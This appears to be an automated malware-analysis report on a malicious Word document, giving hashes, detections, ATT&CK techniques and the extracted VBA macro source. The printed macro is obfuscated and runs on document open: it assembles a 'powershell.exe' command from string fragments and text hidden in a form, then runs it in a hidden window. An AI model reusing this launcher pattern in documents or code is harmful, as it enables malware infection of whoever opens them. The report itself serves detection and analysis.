Office (OLE) malware analysis — malicious · a61f60d864eb3d59

MALICIOUS

Office (OLE)

265.5 KB Created: 2019-02-04 16:36:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 4f80c2f27d48affef92c1e7278d62554 SHA-1: e3294dafaf79a0690cfc4bc743f72be6ad3db33f SHA-256: a61f60d864eb3d592bf31ec7980909efa1efc22a33bf2142eefc017a9b6bc827

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The critical heuristic firing for Shell() call in VBA indicates that the macro attempts to execute an external program. The script explicitly constructs the command 'shell.exe ' which is then passed to the Shell() function, likely to download and execute a second-stage payload.

Heuristics 5

ClamAV: Doc.Malware.00536d-6846009-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.00536d-6846009-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/tiff/1.0/In document text (OLE body)
- http://ns.adobe.com/exif/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1355 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1355 bytes
SHA-256: `f83dffd1edbb936f606e83638bf55556ed43acbc31f519fdfdb6ada66fd49d83`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Dim B0AhdyBJ(248) As Byte Call w("er") End Sub Attribute VB_Name = "LhyvCR" Sub w(UikIH) Dim YK83lHx(236) As Byte Dim HiQr1U HiQr1U = CsTrMk Dim lexGIK5 lexGIK5 = rT6Lx B2T6F7z = "shell.exe " Dim E4uf75(5 To 67) As Long E4uf75(5) = 367 - 142 Shell ftaxEl() _ & UikIH _ & B2T6F7z _ & GjTYMH0WG _ , 0 End Sub Attribute VB_Name = "yyCuJDEjQ" Public Function ftaxEl() As String Dim RxIcCo() As Byte ftaxEl = "pow" End Function Attribute VB_Name = "yM1V6EqB0" Public Function GjTYMH0WG() Dim recSx As Object Set recSx = New f Dim rQ6iW As String rQ6iW = recSx.de.Text Dim CIHrFx(11 To 140) As String CIHrFx(11) = "UWCvn" Dim eCYxpSa() As Byte GjTYMH0WG = rQ6iW End Function Attribute VB_Name = "f" Attribute VB_Base = "0{9B4B23BB-101E-4C8B-BBE2-B6B8DA227E0D}{51F66BF6-30EA-4680-8C22-28CE0E3B6145}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

SHA-256: f83dffd1edbb936f606e83638bf55556ed43acbc31f519fdfdb6ada66fd49d83

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()

Dim B0AhdyBJ(248) As Byte

Call w("er")
End Sub

Attribute VB_Name = "LhyvCR"
Sub w(UikIH)
Dim YK83lHx(236) As Byte
Dim HiQr1U
HiQr1U = CsTrMk
Dim lexGIK5
lexGIK5 = rT6Lx
B2T6F7z = "shell.exe "
Dim E4uf75(5 To 67) As Long
E4uf75(5) = 367 - 142
Shell ftaxEl() _
& UikIH _
& B2T6F7z _
& GjTYMH0WG _
, 0
End Sub

Attribute VB_Name = "yyCuJDEjQ"
Public Function ftaxEl() As String
Dim RxIcCo() As Byte
ftaxEl = "pow"
End Function

Attribute VB_Name = "yM1V6EqB0"
Public Function GjTYMH0WG()
Dim recSx As Object
Set recSx = New f
Dim rQ6iW As String
rQ6iW = recSx.de.Text
Dim CIHrFx(11 To 140) As String
CIHrFx(11) = "UWCvn"
Dim eCYxpSa() As Byte
GjTYMH0WG = rQ6iW
End Function

Attribute VB_Name = "f"
Attribute VB_Base = "0{9B4B23BB-101E-4C8B-BBE2-B6B8DA227E0D}{51F66BF6-30EA-4680-8C22-28CE0E3B6145}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.